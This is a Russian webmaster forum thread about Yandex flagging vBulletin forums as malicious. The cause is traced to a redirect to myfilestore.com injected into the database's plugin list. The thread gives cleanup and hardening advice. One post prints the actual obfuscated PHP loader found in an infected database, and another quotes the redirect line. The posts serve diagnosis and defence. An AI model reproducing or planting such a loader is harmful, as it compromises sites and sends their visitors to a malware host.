форум vBSupport.ru > В помощь веб-мастеру > Общие вопросы сайтостроения
  • »
VBsupport перешел с домена .ORG на родной .RU Ура! Пожалуйста, обновите свои закладки - VBsupport.ru
 
 
 
 
Luvilla
Гость
Default Яндекс: вредоносный код или проблема в другом?

Тема не про вирусы и не про "вредоносный код"
тема про Платонов

Смотрите, какой ответ:

Quote:
Здравствуйте!

На Вашем сайте периодически появляется указанный ниже вредоносный код:

document.location='http://myfilestore.com/download.php?id=*******

при подгрузке следующего url:

домен/misc.php?v=387

Пожалуйста, проверьте Ваши файлы и удалите вредоносный код. При поиске источника заражения воспользуйтесь рекомендациями, описанными на странице нашей Помощи.... бла-бла...

[и ссылки на какие-то слегка подходящие темы на серчё и ещё парочка]
Узнали?
не-не, это я не нашу с вами переписку цитировала
это Платоны сейчас так отвечают

ОК, чуток подробнее

некоторое время назад ко мне обратились с такой проблемой. Яшка видит "вредоносный код", больше никто его не видит
я давно знаю тот форум, да и человек, который обратился, очень хороший... в общем, я там прошерстила всё
базу вывернула наизнанку, строку плагинлист из датасторе рассматривала под микроскопом
отчёт ай-болита проштудировала чуть не напамять
файлы, которые не нравились штатной диагностике, повытаскивала к себе и посравнивала с файлами из дистрибутива
все не-вобловские папки излазила вдоль и поперёк
я ни-че-го-нЕ-вижу!
кроме того, что мне раскопки в той базе приснились среди ночи, я ничего не добилась

А Яшка упорно пишет - есть код, ищите...
и ссылки, который как примеры в панели вебмастера даются, они именно "хаотичные"
предполагаю, что вот эта тема http://vbsupport.ru/forum/showthread.php?t=51068 - случай совершенно аналогичный (пост #12, ответ платонов), но в случае с 4кой утверждать на все 100% не рискну

Но у меня сейчас на руках две троечки
причём одна - вообще лапочка, там даже вБСЕО нет

Что это за урл? /misc.php?v=387
что это за бредЪ?
откуда он вообще берётся, есть идеи у кого? (вопрос абсолютно риторический)

Конкретное предложение, конструктив:

предлагаю начать конкретно пинать Платонов.
Раз уж вы берёте на себя ответственность вешать в выдаче предупреждения о "вредоносном сайте", будьте любезны предоставить веб-мастеру более полную информацию

На какой конкретно странице ваш бот нарвался на вредоносный скрипт?
Что это за скрипт?
Каким юзер-агентом представлялся бот?


Гугл по молодости тоже имел манеру писать: нами просканировано 30 станиц вашего сайта и на пяти из них обнаружен вредоносный код"
но Гуглоботов допинали... вопросами типо "Слыш, ты, умник, у меня 50к страниц, я должен угадывать, какие 30 ты проверил? Можешь, выдашь список этих пяти конкретных страниц, и не будем морочить друг другу голову?"

как-то так...

Прошу простить великодушно, у меня не так много времени, чтобы длинно расписывать, но, надеюсь, смысл понятен: не нужно молча глотать отписки платонов. Взялись сканировать и "обеспечивать безопасность" - вот пусть и обеспечивают.

Если каждый, кто сталкивается с этой проблемой, будет добиваться ответов, рано или поздно ответы будут
А мне кажется, что известные мне случаи - только первые ласточки, что-то там у Яшки в очередной раз сменили в алгоритмах, и теперь его колбасит...

Может, кто грамотный и не ленивый, набросает тут текст, который можно будет отсылать при подобных проблемах?

И ещё момент: несколько раз наблюдаю, типо, "сегодняшний" ответ, что на сайте есть вредоносный код, а дата последней обработки страницы роботом стоит двух-трёх недельной давности
это как вообще понимать?
алерт мы вешаем в режиме реального времени, а смотрим страницы из собственного кеша?

P.S: это ни в коем разе не наезд, если что... я Платонов уважаю, труд проделывается титанический. Но хочется, чтобы всё было ещё лучше...
Bot
Yandex Bot Yandex Bot is online now
 
Join Date: 05.05.2005
Реклама на форуме А что у нас тут интересного? =)
 
 
Konkere
Знаток
 
Konkere's Avatar
Default
0

Не оно?
http://www.diyaudio.com/forums/forum...ct-hijack.html
http://club.myce.com/f20/vbulletin-m...e-them-332219/
 
 
Luvilla
Гость
Default

Quote:
Originally Posted by Konkere View Post
Не оно?
хз... может, и оно
на двух известных мне тройках с этой проблемой меня никуда не редиректит, ни из каких поисков и никаким юзер-агентом, я довольно долго извращалась, чтобы увидеть это вживую - спровоцировать ситуацию не удалось

Если бы у меня на обоих форумах было вБСЕО - тогда разговор был бы несколько другой...
 
 
Luvilla
Гость
Default

так...
мне тут добрый человек выдал все доступы при наличии этого самого подтверждённого редиректа на myfilestore

Ну что сказать...
всё точно как было описано вот здесь: http://vbsupport.ru/forum/showthread.php?p=380964

отправляемся в ПМА, открываем таблицу datastore, строка pluginlist, только вот base64 искать бесполезно
ищем глазками, так оно вернее))

во-первых, "вставленный" код сильно выделяется по формату
во-вторых, перед ним - дыра, строк сто пустых, такого штатно в датасторе нЕ бывает

вот конкретный пример найденного мною сегодня:

Code:
$pt = 'bfb83b8d248072fc3e923a0d7ef4b4f7';
$arrvb = '[R_=#AH_p[3"rP[abP[#Vj@?Vu=&_S?q!KZ`mu=8%$!zH8.:_T?&KuS"_K.:a}lLaxLN[}/g%>PL_K.nH$,7KuS}a8?}a}apW>L{Vj@bVugR!z?=a`VRa`W`th4Nm]zN!yeNa].=P>lLKzFI(z/HVjF:KxLN!K!eH>eyOK.=.9/)!$S9Hu/=%j.:a=?}H]ZgW}lLKzFI(z/HVjF:KxLN%EpLPEz4ajV=!z?;OK/9_>l`iuVRPjgqa$=L!KV2O]VePug2augza`F2[T,&!$S"iuL`t>/)(:SxSLSxT}PiS,/ZKzSE/SV)Z(P,E=Z`KxL{VjW?ZjFea`.=K]S}H>lLKz.,(=!,(=p`x,/((,?x/(!,(LSxVz:Nm}/:I(4Lazp`_$?qP>PPm}/}I(Fna8S`KuzeP$.b%>a9H$=u!Sn&Ou?;)$PRHuPp!Sn&)j=e_$?RK>72O8=&!}79Huz2[T,&!$S"K>7}PKg}OTzyH$S}K>7}PKgyOT=LPSn&)$!eOuSyHu?~K>72_T7qP$,`a8,;K>72P$=&[KS}H,n&)$VNP,n&HjL9_xapVjZN)jnLPh:?V]Z&Ou2`m}/bI(4LKz.,(=!,(=p`x,/((,?iEz.(Vz:{Vj4?Z@.IE:;V/S?Z(LS$xSl{V$@?Z,/ixS.)(:.xxSF(IE:?VuzNauW`m}/9Ix/ntyPpOK.:P8=q_KZ`m}/&Ix/ntyPpOT7`Ku=LVqpL[Ez4H]VL%@!VE@S)SLSx(:=IEyLQae~#"]6Q.E@{Vjb?!TznPjLbV,?E/SVT/SVHV:e(S,F)T,?.Ezb`KxL{V$b?VqgqO]VNajZlPj=n!E:yP$S"P>?JOK!eau.}_KF:iyFqa8W?iya&Vj!yPTgp!K/NHy:Qae~#"]6QH]F:_T?&azp`O8Vza8n`Kx"`tuzNauW&a$enI]O?V}"LP8VzH$g=P$=&tE7Raj/NHu7qT}Pq_TznH$Su!KVq_T?&Vz:&V}!eHK4{_`W?_`WyI9nRau.}_KF:Iya{_TOb!TznPjLbV,?hE:?tx(SHV$7P%x={_TObV$@8V8=qauS:%>/)/:S(T}PuVz:NVyOb_K.q!KZbV,?j/S/HVuNqVz:N%xO8%>,=HKF:[xlLK:.IE:;V/SpLOz:N%x={_TObVjZ?Ix/b%K;N!ylL[y=q!K/9Hu?~_T(bV$"pVuS&V}g:_Tz=%>L~WqOnWh4Nm}/;IK.zO`.:aye;!h(bV$lNth4pm>L{ajVNH`Zbi8/RO]S;!T7:t8gROu,:_T?&IxPbPj/nmy2RHK=8_Tg=a]/Ra8(&Ou?;tu/RPu7pHu,Lt`Fbah?N!hz{V$z?V}iNm]z=[$=:m]zN!ylbix/z%xO8VjiN[u=8%>/7%KpL/:gIZL,W(zp`P$S;a$geP$S)_$?R_}PPT}Pb!T,L_T79HjSL!S?JOK!eau.}_KF:Vz:&Ix/Jm]z=Hj.=[}/jE@?>Z(gET}PqPj=p!xPPT}P9a]W`Kx"?V$b{)Kz?66^';
$ajx = '";<sJZ$nCa1X*re9,!.f|x)5:Iu^yPq4U}S#lvz8%Q>+W_b6{M~/&-L2HkjKhd`GYgVptADFo=]?ciOwR([7@m0T3NEB';
$ajx2 = '4t#]qQGw[c"$^_hjFZN!{Sf/0P2;idzA:yV(g?1mK.C}Mao)7%rRu,k8b~HXD&n<|xJsL@+B*l39-IY`vUe5EO>W6pT=';
$baseline = '%s%'.substr($arrvb, 507, 1);
$gpu = preg_replace($baseline, strtr($arrvb, $ajx, $ajx2), 'vbseo');
как видите, он чем-то смутно похож на показанное тут http://club.myce.com/f20/vbulletin-m...e-them-332219/
но найти можно только глазами

Лечение простое и известное:
Quote:
Originally Posted by Luvilla View Post
админка - продукты и модули - пересохраните любой модуль
datastore перезапишется, вредоносный код исчезнет
гораздо интереснее, каким образом сей код впихивается в базу
собственно, система-то понятна: любой уязвимый хак, позволяющий пихнуть инъекцию, и... имеем то, что имеем

Стандартные рекомендации:
откладывайте все дела, садитесь заниматься форумом
1. Начните со списка установленных продуктов
проверьте каждый продукт: он точно вам нужен? может, ну его? "Меньше хаков - крепче сон!"
нужен? - ок, отправляйтесь в тему с хаком, не важно, тут, на орге - читайте тему! Убедитесь, что у вас установлена самая свежая версия, посмотрите, не было ли сообщений об уязвимости в этом продукте
нЕ держите выключенных продуктов, особенно если есть сомнения... не используете? - удаляйте!

2. Админка - диагностика - "версии устаревших файлов" (или как-то так) - вперёд
убедитесь, что у вас в штатных директориях не валяется неиспользуемых "левых" файлов
в обязательном порядке поудаляйте файлы от хаков, которые были удалены

3. Отправляйтесь в файловую систему и пересмотрите нЕ-вобловские директории, там тоже может быть много интересного

В обязательном порядке смените пароли всем, кто имеет доступ в админку. Хакер имел доступ к вашей базе, не надейтесь, что он только скромно пихнул модуль с редиректом... он выжал их вашей БД всё, что смог
 
 
kerk
k0t
 
kerk's Avatar
Default
0

опять дырявая вбсео?
она ж помэрла, не?
почему ее до сих пор пользуют?
кактусы вкусные? грабли паролоновые?
нипанимаю...
 
 
Luvilla
Гость
Default

Quote:
Originally Posted by kerk View Post
она ж помэрла, не?
та вроде ж ожила... "эту песню не задушишь, не убьёшь"

я не уверена, что инъекцию могут запихать исключительно только через дырявую вбСЕО
у моего сегодняшнего "пациента" вбсео как раз нет
зато есть куча хаков, куча файлов от старых хаков и сипекс_дампер в открытом виде
 
 
Luvilla
Гость
Default

Искала сегодня ужгородский форум (хочу поехать на сакура-фест), ну, хотелось именно форум, чтобы пообщаться, и чтобы вобла...
всё какая-то муть у Гоши в выдаче... какие-то то мего-порталы, умершие года три назад... то ИПБ, то и вовсе ЕХбб... вдруг смотрю - в ссылке /forumdisplay.php?f=
Не могу передать, как я обрадовалась! Вот оно, мне-понятное-ЧПУ!!! сорри, не удержалась, простите, ЧПУшники, но в этом конкретном случае камушек в ваш огород просто нельзя было не запустить...

Это была присказка. Кликаю по ссылке, и.... угадайте, что?
ну, молодцы, кто угадал - возьмите с полки пирожок
меня лихо редиректнуло на myfilestore.com
4.2.3, вбСЕО нет
отписала в обратную связь, потом подумала, что - хз, ходит ли там вообще почта с форума, зарегистрировалась, отписала админу в ЛС

так... к чему это я?
Админы, не теряем бдительность!
Если вам облом периодически читать, что там у вас валяется в БД, то похаживайте иногда на собственный форум из поисковиков, это простой и доступный способ проверки.
 
 
Smalesh
В Черном списке
Default
0

Luvilla, расскажу эпический случай с этим яндексом. Блочат форум forum.domain.com как вредоносный. Лезу смотреть - да все чисто.
Пишу им, получаю феноменальный ответ
Quote:
Здравствуйте, ***!

Мы подозреваем, что Ваш сайт подвергся взлому. Воспользуйтесь, пожалуйста, рекомендациями, описанными на страницах нашей Помощи:

http://help.yandex.ru/webmaster/?id=1116613
http://help.yandex.ru/webmaster/?id=1127486

и проверьте файлы на наличие вредоносного кода.

Пример опасной страницы приводим: http://blabla.domain.com/wp-includes/**** Если Вы не являетесь лицом, ответственным за безопасность сайта domain.com , пожалуйста, передайте эту информацию соответствующим сотрудникам Вашего сайта.
Но только blabla.domain.com (там wp, ломанули, все дела) находится на другом ip в другом датацентре у другого админа. А мой forum.domain.com на самом деле чист ака слеза младенца. Сам domain.com не заблокирован, домен ua, с ТМ и так далее.
Писали бы на абузы в whois или блокировали только зараженные поддомены (по факту просто домены третьего порядка). Нет же, влезли блочить то, что блочить не следовало.

От всей души им посоветовал им заблокировать *.narod, *.ucoz и т.д.

Номер тикета #11022215551052932
 


Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off




All times are GMT +4. The time now is 10:21 AM.


Powered by vBulletin® Version 3.8.6
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
Loading...